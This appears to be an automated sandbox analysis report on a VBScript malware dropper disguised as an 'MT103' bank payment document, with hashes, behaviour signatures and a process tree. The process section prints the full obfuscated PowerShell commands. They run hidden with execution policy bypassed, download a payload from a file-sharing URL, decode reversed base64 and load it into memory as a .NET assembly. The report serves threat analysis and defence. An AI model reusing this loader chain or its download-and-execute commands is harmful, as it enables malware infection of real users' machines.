Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 08:01

General

  • Target

    MT103-8819006.DOCS.vbs

  • Size

    13KB

  • MD5

    a2dc941889770cb179129bf7cb89bdff

  • SHA1

    08a0a77a3754e6bee435810785802e0d054ce46b

  • SHA256

    9b8e6b4547ae0f5a3e4af5a94282ccd5bcbb464dabe75ec564315cd768d25806

  • SHA512

    e5495fe46ac92d0e92913c750224435e013e62def24f32781802964b66ee343d5bb8724f337c478eabc428a59e42a955b5f1f879463b0d8bc45803720b062006

  • SSDEEP

    192:REpO+HDu/0/Jutko/4jos+9/uHLGHRkfkX:REs+AftkW8p+9/urGHRk8X

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

exe.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MT103-8819006.DOCS.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFNoRWxMaWRbMV0rJFNIZUxsSURbMTNdKydYJykoICgoJ1c4WicrJ2knKydtYWdlVXJsID0gZGpLaHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzgnKydjOWJmYjk1NzEnKyc3MzI1MzEzMDliNWZmN2MgZGpLO1c4WndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC4nKydXZWJDbGllbnQ7VzhaaW1hZ2VCeXRlcyA9IFc4WndlYkNsaWVudC5Eb3dubG9hZERhdGEoVzhaaW1hZ2VVcmwpO1c4WmltYWdlJysnVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaScrJ25nKFc4WmltYWdlQnl0ZXMpO1c4WnN0YXJ0RmxhZyA9IGRqSzw8QkFTRTY0X1NUQVJUPj5kaks7VzhaZW5kRmxhZyA9ICcrJ2RqSzw8QkFTRTY0X0VORD4+ZGpLO1c4WnN0YXJ0JysnSW5kJysnZXggPSBXOFppbWFnZVRleHQuSW5kZXhPZihXOFpzdGFydEZsYWcpO1c4WmVuZEluZGV4ID0gVzhaaW1hZ2VUZXgnKyd0LkluZGV4T2YoVzhaZW5kRmxhZyk7Vzhac3RhcnRJbmRleCAtZ2UgMCAtYW5kIFc4WmVuZEluZGV4IC1ndCBXOFpzdGFydEluZGV4O1cnKyc4WnN0YXJ0SW5kZXggKz0gVzhac3RhcnRGbGFnLicrJ0xlbmd0aDtXOFpiYXNlNjRMZW5ndGggPSBXOFplbmRJbmRleCAtIFc4WnN0YXJ0JysnSW5kZXg7VzhaYmFzZTY0Q29tbWFuZCA9IFc4WmltYWdlVGV4dCcrJy5TdWJzdHJpbmcoVzhac3RhcnRJbmRleCwgVzhaYmFzZTY0TGVuZ3RoKTtXOFonKydiYXNlNjRSZXZlcnNlZCcrJyA9JysnIC1qb2luIChXOFpiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgSWlIIEZvckVhY2gtT2JqZWN0IHsgVzhaXyB9KVstJysnMS4uJysnLShXOFpiYXNlNjRDb21tYW5kLkxlbmd0aCldO1c4WmNvbW1hbmRCeXRlcyAnKyc9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoVzhaYmFzZTY0UmV2ZXJzZWQpO1c4WmxvYWRlZEFzc2VtYicrJ2wnKyd5ID0gW1N5c3RlbS5SZWYnKydsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChXOFpjbycrJ21tJysnYW5kQnl0ZXMpO1c4WnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZGpLVkFJZGpLKTtXOFp2YWlNZXRob2QuSScrJ252b2tlKFc4Wm51bGwsIEAoZGpLdHh0LmNpdi9mZGgvcG90Lmtuc2NtbWxsaXJkLmxsaScrJ2IvLzpwdHRoZGpLLCBkaktkZXNhJysndGl2YWRvZGpLLCBkaksnKydkZXNhdGl2YWRvZGpLLCBkaktkZXNhdGl2YWRvZGpLLCBkaktNU0J1aWxkZGpLLCBkaktkZXNhdGl2YWRvZGpLLCBkaktkZXNhdGknKyd2YWRvZGpLLGRqS2Rlc2F0aXZhZG9kakssZGpLZGVzYXRpdmFkb2RqJysnSyxkaktkZXNhdCcrJ2l2YWRvZGpLLGRqS2Rlc2F0aXZhJysnZG9kakssZGpLZGVzYXRpJysndmEnKydkb2RqSyxkaksxZGpLLGRqS2RlJysnc2F0JysnaXZhZG9kaicrJ0spKTsnKS1yRXBMQUNlICAnVzhaJyxbY0hhcl0zNiAgLXJFcExBQ2UgIChbY0hhcl03MytbY0hhcl0xMDUrW2NIYXJdNzIpLFtjSGFyXTEyNC1yRXBMQUNlICdkaksnLFtjSGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $ShElLid[1]+$SHeLlID[13]+'X')( (('W8Z'+'i'+'mageUrl = djKhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638'+'c9bfb9571'+'732531309b5ff7c djK;W8ZwebClient = New-Object System.Net.'+'WebClient;W8ZimageBytes = W8ZwebClient.DownloadData(W8ZimageUrl);W8Zimage'+'Text = [System.'+'Text.Encoding]::UTF8.GetStri'+'ng(W8ZimageBytes);W8ZstartFlag = djK<<BASE64_START>>djK;W8ZendFlag = '+'djK<<BASE64_END>>djK;W8Zstart'+'Ind'+'ex = W8ZimageText.IndexOf(W8ZstartFlag);W8ZendIndex = W8ZimageTex'+'t.IndexOf(W8ZendFlag);W8ZstartIndex -ge 0 -and W8ZendIndex -gt W8ZstartIndex;W'+'8ZstartIndex += W8ZstartFlag.'+'Length;W8Zbase64Length = W8ZendIndex - W8Zstart'+'Index;W8Zbase64Command = W8ZimageText'+'.Substring(W8ZstartIndex, W8Zbase64Length);W8Z'+'base64Reversed'+' ='+' -join (W8Zbase64Command.ToCharArray() IiH ForEach-Object { W8Z_ })[-'+'1..'+'-(W8Zbase64Command.Length)];W8ZcommandBytes '+'= [System.Convert]::FromBase64String(W8Zbase64Reversed);W8ZloadedAssemb'+'l'+'y = [System.Ref'+'lection.Assembly]::Load(W8Zco'+'mm'+'andBytes);W8ZvaiMethod = [dnlib.IO.Home].GetMethod(djKVAIdjK);W8ZvaiMethod.I'+'nvoke(W8Znull, @(djKtxt.civ/fdh/pot.knscmmllird.lli'+'b//:ptthdjK, djKdesa'+'tivadodjK, djK'+'desativadodjK, djKdesativadodjK, djKMSBuilddjK, djKdesativadodjK, djKdesati'+'vadodjK,djKdesativadodjK,djKdesativadodj'+'K,djKdesat'+'ivadodjK,djKdesativa'+'dodjK,djKdesati'+'va'+'dodjK,djK1djK,djKde'+'sat'+'ivadodj'+'K));')-rEpLACe 'W8Z',[cHar]36 -rEpLACe ([cHar]73+[cHar]105+[cHar]72),[cHar]124-rEpLACe 'djK',[cHar]39) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2300

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    a3fe0930cb5723032447530e908aab3a

    SHA1

    69b04ff5b60811be08a4ef4d0733a2026f70c330

    SHA256

    2f04f90372a5ae8631ce9094ef0c680b42aac3e0f68de0d9a5bd00dfd1fdc779

    SHA512

    4081e71cd4ad5ac0e461ca991c3de62ccf66b622906429314192cd647ca159c8331a9abfaac12c930d863d4bcb791a51ab044272efeda897fb946c61011ba014

  • memory/2412-4-0x000007FEF5B2E000-0x000007FEF5B2F000-memory.dmp

    Filesize

    4KB

  • memory/2412-5-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-7-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-6-0x0000000002820000-0x0000000002828000-memory.dmp

    Filesize

    32KB

  • memory/2412-8-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-9-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-10-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-11-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-17-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB